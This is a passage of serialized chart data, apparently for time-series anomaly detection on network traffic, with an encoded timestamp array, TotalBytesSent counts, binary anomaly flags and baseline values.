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QgAAOPn7rHZCAAAgaP+sdkIAAAjXAq12QgAA8EUGrXZCAADYtAmtdkIAAMAjDa12QgAAqJIQrXZCAACQARStdkIAAHhwF612QgAAYN8arXZCAABITh6tdkIAADC9Ia12QgAAGCwlrXZCAAAAmyitdkIAAOgJLK12QgAA0HgvrXZCAAC45zKtdkIAAKBWNq12QgAAiMU5rXZCAABwND2tdkIAAFijQK12QgAAQBJErXZCAAAogUetdkIAABDwSq12QgAA+F5OrXZCAADgzVGtdkIAAMg8Va12QgAAsKtYrXZCAACYGlytdkIAAICJX612QgAAaPhirXZCAABQZ2atdkIAADjWaa12QgAAIEVtrXZCAAAItHCtdkIAAPAidK12QgAA2JF3rXZCAADAAHutdkIAAKhvfq12QgAAkN6BrXZCAAB4TYWtdkIAAGC8iK12QgAASCuMrXZCAAAwmo+tdkIAABgJk612QgAAAHiWrXZCAADo5pmtdkIAANBVna12QgAAuMSgrXZCAACgM6StdkIAAIiip612QgAAcBGrrXZCAABYgK6tdkIAAEDvsa12QgAAKF61rXZCAAAQzbitdkIAAPg7vK12QgAA4Kq/rXZCAADIGcOtdkIAALCIxq12QgAAmPfJrXZCAACAZs2tdkIAAGjV0K12QgAAUETUrXZCAAA4s9etdkIAACAi2612QgAACJHerXZCAADw/+GtdkIAANhu5a12QgAAwN3orXZCAACoTOytdkIAAJC77612QgAAeCrzrXZCAABgmfatdkIAAEgI+q12QgAAMHf9rXZCAAAY5gCudkIAAABVBK52QgAA6MMHrnZCAADQMguudkIAALihDq52QgAAoBASrnZCAACIfxWudkIAAHDuGK52QgAAWF0crnZCAABAzB+udkIAACg7I652QgAAEKomrnZCAAD4GCqudkIAAOCHLa52QgAAyPYwrnZCAACwZTSudkIAAJjUN652QgAAgEM7rnZCAABosj6udkIAAFAhQq52QgAAOJBFrnZCAAAg/0iudkIAAAhuTK52QgAA8NxPrnZCAADYS1OudkIAAMC6Vq52QgAAqClarnZCAACQmF2udkIAAHgHYa52QgAAYHZkrnZCAABI5WeudkIAADBUa652QgAAGMNurnZCAAAAMnKudkIAAOigda52QgAA0A95rnZCAAC4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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[840]},\"TotalBytesSent\":[873713587,882187669,852506841,898793650,891598085,893022551,922677236,856663011,830763825,855292297,867265088,783423911,797876828,790012871,852519704,801772685,807320821,811995775,857108417,668803434,644214662,716435846,718165305,846441590,913851950,909281093,910496479,860491701,907134623,951830968,863445775,883803886,947731570,897928218,862303611,891357428,874557665,802427120,869716161,851558231,906453909,843625312,807469579,695427997,643948011,677938461,666457868,890567174,920136656,864647530,865802529,937646970,918357380,889610303,913645805,887186534,965532850,825807779,903819076,827999022,916732278,903529290,869875766,877268278,901985353,820902488,839550728,697140933,725116765,718391605,734634539,961618771,973519876,931452710,936782632,902828719,956018750,901050381,986348136,888182919,895773023,860244868,894638180,932630230,877076050,904708616,885212895,928834714,882928145,897273726,845388269,730597647,733994909,696100730,677795812,944003798,940124451,903070877,966821399,928572732,968103682,942345100,918154112,908724455,969661489,869552513,928906452,858754943,852800036,956027685,899862034,914327713,868670704,863683195,905245396,698524204,751378763,788098393,718327017,457637899,407128034,427965408,416582611,405735621,475934081,391911247,382779518,418150700,439492547,344212429,385151272,402634638,348130418,330143017,412007535,354978767,383963655,426783985,402920595,216671778,186952988,256555183,237640219,459615281,450916734,439791726,407339745,460514032,473271204,42271963,452867549,433833905,412908587,399529976,351788448,357793541,420058661,388618694,344244340,384677308,350548288,433051287,434604199,227336212,181142300,225420990,242379095,1022669703,953364734,1033085221,969714599,1013729943,981345529,1037288750,991165062,984493550,978367044,938879683,955831823,905906975,957606717,929509010,1002659157,935735110,930332470,956107825,984858191,855085656,753446631,806497013,799747641,1026442326,1077848994,1042074279,989569304,1057453529,1057338096,1067745732,1039937078,634395781,1038853034,988661138,971145433,1020524701,1023040605,1026067148,974899180,925481646,1008014066,978065792,976248064,788591993,819890342,776408096,826110086,1034936595,1039212114,1022464025,1075642770,1055035913,1061634536,1076072442,1061904372,1051809129,1055544997,1039038521,946540104,982693333,1040505474,963020903,1017382900,974943158,986877436,977686629,946411386,818997628,799954180,862299582,836341534,1025090070,1007907120,1027324682,1016950649,1090135061,1066631292,1087552149,1011146902,1096276461,1053690335,1026041317,995544290,964045673,1007207382,976018535,1044530213,1056525176,1009998583,1020296930,996836955,858490388,830213157,845167877,837203412,1100015423,1074240368,1085046504,1119540427,1066062542,1111993335,1074743022,1075393902,1096429594,1104942722,1043375756,1004789142,1009115136,1036882213,998556234,1061527144,1059037422,982935955,1070078489,1074805675,823993813,845965247,908350645,909155856,594596972,588339826,513974580,498608477,564220831,526136510,537404241,503702057,562529456,565679688,446033781,493641472,916767394,467545424,466436663,459461022,486413184,538919515,494288347,503115084,338429270,376607397,335536198,305752110,579716989,607277895,580925641,591887341,535053510,542852243,600980027,572841825,610227565,597944660,478582894,533450021,523528503,483109880,575159745,542252387,545441292,575681208,566276013,572591706,353152221,351089795,402680601,398099696,1124558087,1094578207,1149602244,1127141868,1188500821,1171529151,1137436272,1134543931,1102054311,1085571380,1079571807,1085991361,1056982073,1133881950,1064259706,1083322471,1110532757,1116891783,1069608690,1138721940,891550671,930699055,913962202,880548252,1163276194,1118538836,1134609747,1197648313,1140866762,1124279760,1202915026,1156873076,1189829422,1190081828,1089603867,1150060587,1067572234,1077762137,1101599618,1125614650,1054136082,1160099162,1097202834,1140124125,999404394,930962307,984346459,989561872,1212679768,1143875331,1175140739,1136172485,1216091392,1166238768,1213483016,1141226357,1142413009,1202291677,1096804116,1103237642,1136332093,1078214113,1082330918,1105565630,1555286702,1170305747,1081316124,1105199753,921977750,983638609,994542648,963769124,1181536839,1201880958,1221525336,1183995519,1230322064,1155522276,1188888461,1145193164,1155701298,1188033929,1085635585,1119451105,1174983532,1189287942,1104109113,1112397263,1187541501,1132189425,1176740195,1193123726,997973374,987071459,1016780205,1022792246,1259584702,1171617419,1201434219,1197268131,1246202606,1193402296,1179520250,1229313145,1242054018,1213590384,1211392931,1210114874,1143940643,1125394273,1108593833,1155662210,1163561397,1163391090,1158459579,1146162232,1012664439,1006936386,1032638042,964323187,726832364,673815250,673077290,683083834,641410712,728453985,641745207,704815291,726998848,657695371,652574108,613671163,603748816,638653988,662712107,597580224,605047075,662654036,608539632,688872417,514920636,447879593,510485297,484271754,676461315,660568258,702440857,675871159,725286517,670973900,727885782,744687972,675085296,651879749,665241172,627295101,683310114,607687695,667111982,646866052,655118217,614153533,703929185,687145906,491031685,475837204,527835918,536374191,1233566650,1302272008,1289104217,1281107991,1278953301,1232111868,1294651802,1240461427,1305202257,1296015157,1265505042,1203512594,1255884232,1231314521,1186407921,1166835959,1205765612,1166356313,1223852614,1269667059,1041230333,1108569577,1032000916,1055812151,1234663961,1293752411,1312405451,1272792567,1244937177,1228548121,1246364826,1327024928,1243726839,1246608903,1266850172,1250452305,1236222417,1261777865,1241712737,1188691842,1290406309,1237931166,1286266734,1254724526,1024325551,1129096497,1094744542,1106153922,1271645012,1347794452,1351655119,1334942686,1251176674,1269615109,1344451748,1314975114,1337578152,1348381350,1299125075,1261105761,1295117140,1275566823,1218600630,1205956592,1228909763,1280308251,1293029712,1209380432,1119365150,1060920766,1061436742,1094057836,1338597036,1313165433,1363214977,1291210639,1301482144,1298243874,1324592383,1346187572,1346602309,1307023171,1246832320,1320019656,1322110891,1289406441,1245116093,1233689715,1246103258,1282225691,1324849514,1264425198,1085445814,1103826656,1135021543,1093951930,1768911488,1344644367,1325119826,1352683245,1388311605,1386178294,1314885144,1390097286,1340372349,1308315998,1248477459,1307770976,1277794700,1301026627,1275879844,1337627540,1266847511,1250826284,1250775463,1303065742,1083159258,1075790124,1124244637,1142869516,844634233,831852994,858119325,756699030,859346504,782955826,766149662,820109225,843569927,862042352,772626268,741265353,752637777,711080800,787329634,760437876,775861416,707501549,786003450,782503059,651765460,613346276,641089364,588356946,825822420,820488600,839810018,816681132,806727645,862121762,850428593,833831322,837988090,882639328,812175783,788758153,736528580,763329213,782038749,792206615,812923462,737361821,808975990,806454559,654882781,595837479,615062385,605973282,1368926432,1355926496,1348926724,1337306282,1410566043,1341735073,1343795224,1435220844,1379367502,1384310206,1365457344,1360152030,1366919111,1376774721,1338677133,1379408603,1326759966,1337344137,1365622686,1390260265,1162133464,1191190594,1172019258,1209471254,1418034087,1363742046,1425275938,1432759288,1380549618,1398671177,1405068973,1385686319,1409991781,1447319641,1380666340,1333216667,1322760361,1398705231,1315549876,1356737170,1394306054,1322876966,1353514970,1333873537,1226651039,1255761136,1231513058,1168746496,1416639066,1427112735,1461381214,1412016648,1447531904,1477902019,1394862023,1477340485,1483015065,1443581624,1404994511,1326704915,1405705118,1432086031,1349510015,1372709257,1426258965,1400670563,1393785274,1360268291,1227162238,1260832816,1263051135,1269304066,1442954939,1495282173,1489786658,1448466267,1480962739,1398602833,1469105751,1468864803,1412196168,1400145473,1439154948,1441755515,1451670670,1414405345,1361733906,1389770777,1389767204,1357535607,1412196256,1361244164,1214116379,1218696527,1236011876,1258844480,1471186871,1407500147,1505744090,1475423157,1480762935,1503614110,1496402547,1417036285,1437493594,1493592827,1436181558,1441047945,993152841,1453223308,1373485407,1471798370,1419431171,1453799427,1372937500,1379938036,1284457376,1287902888,1236144771,1261400942,960208787,939095822,930978685,944830098,925097517,986308242,919493841,927218360,971499707,955771283,834582332,852630670,874504602,914012315,834761544,908744348,853162780,922265182,859919693,930111090,737693868,722223752,758772577,706415711,994897470,974844971,916462999,965722723,913345256,900491348,917100812,905215807,910648863,1008418310,900965862,870174355,876299048,878786944,874525847,953351422,961309357,910212834,913189663,946670363,754488773,762510726,746115005,744582340,1469756566],\"anomalies\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],\"baseline\":[885329547,884137911,859469258,884708691,886401701,907704753,893996748,859030090,871961185,860212543,855785334,806594000,826047534,778593114,840751969,800300208,832580735,794806795,808622712,654523858,617036216,668087855,673783442,883105643,920608590,906293918,896188115,909840496,921583246,924397144,920946390,885101821,910645996,871423280,883479285,845372092,858022044,832753761,866639081,846494697,864602424,830698215,836189661,686903306,667874827,700820155,698504802,884263627,915199451,890288444,894926763,895553052,919664214,906923577,911964069,880881992,921133753,860407900,890665853,867416996,875031717,875679249,888872158,889525280,897542572,872274369,873046289,728145532,727801947,748799083,739028823,893933971,918282323,885830597,904668887,899157118,933141584,901504940,918557529,889464450,939001637,856323862,905878497,888321405,891085330,917973276,909361619,925203772,920395167,905887129,905940485,759196050,778362888,791121291,774640787,892535985,889005775,871541165,890180507,884740326,930824061,844513069,902026466,878666389,907786768,827040226,861628671,842276769,819399963,837463052,818534673,811778594,780005138,779030217,758457512,571277658,561897608,568217257,525866782,660930399,621512348,603077749,586348085,572602832,593066772,437120849,523152874,501763312,505155602,428760405,437025273,413772445,402633409,407450465,403380725,392817527,370823494,403387263,402601706,216579646,198497601,239637112,217198071,462649524,433513807,448308349,420751274,447793862,466118933,335573055,437134350,401809830,451964654,405700827,419691046,421153421,449488451,452071907,482240771,473406768,488919645,542859922,565144316,402079162,380685801,441400022,454951100,806100855,809768646,838213155,819402581,876581608,894373410,811167139,908407242,813762458,925172036,897209825,889351344,901880603,938989680,917421284,928979993,897143763,910131569,931028120,929241963,754089094,710473117,733178497,737894587,1091773829,1081442032,1082397634,1054754054,1087278537,1073976214,1048385273,1052760618,932983908,1036495461,998066848,960505583,963618778,998439498,961959163,978900178,938985436,953872019,956850668,951878928,796084262,765359547,787012914,792273834,1061401584,1059974246,1057910598,1051874996,1078748961,1073429552,1084959210,1047229268,961503359,1053835725,1017662681,975675644,985527414,1021628361,985721470,1019932015,992020347,997552480,1002367379,991577702,834748439,823552379,847181504,851339632,1019185277,1014798684,1009403799,1023786590,1041053771,1046192627,1051224660,1022892098,1019208770,1055201606,1015066963,980991509,1035269389,1030886173,998634100,1048888067,1044910728,1034925145,1056653807,1049976584,884090231,889630827,923309726,922351199,1019571020,1015009271,1005317387,1020446628,1037887551,1040930056,1048886235,1018407439,1064307316,1054263159,981857654,966144956,1063306597,960006996,931612771,955612287,947735923,917410466,916729922,896190641,695728897,686203056,692513777,663775338,786514225,764400303,730509096,718521094,706701902,689844560,681762010,642160381,664895102,645218452,548277161,551944187,655437109,526101341,521776940,529949643,536827983,532411052,533221027,541478998,334104323,350799041,367850241,354080137,592861875,584413154,574675261,578263791,584358664,577080701,594743584,576672668,604906249,605670853,531279139,572731132,673925923,582503596,602101630,617998186,639618299,681151556,672521794,714628782,522623522,553117370,580700510,579863744,938153824,933787384,958762026,981821836,1000522615,999720668,1045217564,1028142483,1055015674,1064275747,992923540,1037430098,1057157529,1025225255,1038143387,1044282284,1082088576,1083995723,1035728443,1067656867,864939128,862970273,876664348,855688341,1224016013,1185142366,1205752436,1200032734,1213513001,1179534069,1209269209,1164267664,1165267810,1173406045,1088928353,1113854539,1091479906,1092627046,1079723158,1091707601,1198336280,1126499364,1074602093,1110899154,916786204,919987868,940347811,923935912,1211080739,1171622993,1196553335,1187514285,1217113271,1170782979,1206811928,1166492624,1174953032,1195175012,1111446397,1137584470,1130470398,1125933450,1102992613,1125078812,1259512902,1163781639,1129809487,1159252450,984217754,986695573,1013746520,999237958,1185727281,1143020609,1167219462,1154079791,1192072490,1153049225,1172409849,1158244070,1173246942,1187069311,1123405150,1141030313,1144199644,1138606311,1121561435,1144022823,1282818305,1190868573,1174187169,1200477911,1038001850,1041844377,1077489949,1057771424,1168244039,1132023852,1158468046,1149028728,1181985931,1163445465,1158970780,1174081926,1179128370,1163326246,1122342601,1112167290,1106636230,1091650674,1066956753,1054125830,1110011949,1053430333,1034235346,1040105751,852615362,818811687,839263959,795415820,912033186,862500590,864893216,839116415,840833873,810581543,791136616,801885323,787209644,743150679,718902237,683512414,678621202,654447905,651523063,632137334,644699763,637307132,650946037,670946304,493017416,473462282,506372199,486350132,700921380,697517504,710970449,699900721,705903191,695400321,708646104,732700953,733170194,710454520,715013559,685941869,715679320,709386828,730603322,716645009,756866378,760141947,807255352,846848692,667607502,689952957,717168338,730019233,1034815995,1084615213,1113302046,1109839185,1118316663,1112841929,1163509527,1190010750,1186371081,1183768097,1187740313,1156192840,1190446938,1176341557,1172639009,1141022514,1182288786,1155234517,1199017174,1194453133,987434393,1011166772,993931514,1000513431,1310849420,1355050833,1361578726,1328476423,1298978256,1275870119,1319263264,1319637578,1306121831,1296141125,1272048741,1240694270,1260351920,1241710983,1207970645,1178436647,1223192665,1208803119,1252414012,1224693697,1038274482,1069876469,1047653919,1060782656,1352570441,1345692577,1359115185,1325398501,1297737291,1290528183,1319860656,1337172098,1321527015,1308962650,1273738426,1275701627,1283611911,1275484643,1235505168,1219877436,1253235930,1259293173,1293338540,1257103074,1083143722,1105734024,1104088851,1111922871,1387496179,1297403594,1314115494,1284159872,1284639608,1281452984,1293414314,1328795968,1320575452,1311085148,1264631702,1292499672,1300379573,1297100692,1275848476,1284081167,1293962516,1308043930,1342785131,1320265346,1159450181,1160452064,1187078795,1189906128,1415729535,1296551994,1318007279,1282282272,1316274068,1305924347,1296338768,1333403079,1327017322,1315275608,1243224896,1258405251,1243164881,1221518957,1207064307,1201697703,1178627154,1148071366,1171485239,1144879107,961254849,925263258,939372996,906325912,1138911085,1004920928,1000604363,948370902,977155490,946353011,908187538,935629257,911420829,903620366,824762701,821007505,794577148,784990780,790138158,798263326,781582056,740079688,786033197,793032237,618982717,595540111,622122701,609182407,885065338,829216774,844114720,812388553,853771364,835500023,824211194,865721042,860669311,885875540,832373598,825861314,821121913,841405647,857563388,887122493,893840093,862947195,928916970,952321994,799854473,798713580,825071650,830485070,1175337043,1172659264,1214068890,1208211959,1243474971,1253841995,1258289260,1303266832,1310630783,1342852399,1299877378,1278001064,1280009495,1313018149,1288518969,1314856748,1321741434,1276283344,1314990271,1308741734,1145682993,1140473722,1130935487,1112709627,1466888763,1449284157,1469212767,1443128278,1452100444,1438550900,1419328541,1450534241,1433386080,1432714535,1390167398,1347833560,1357792081,1383489517,1321394740,1350043649,1360245567,1322690529,1347608524,1332689196,1178020818,1195808543,1187028732,1180451879,1446032136,1439653476,1471743027,1443439373,1455236488,1441780854,1436186961,1455285907,1444521096,1445436950,1419505721,138557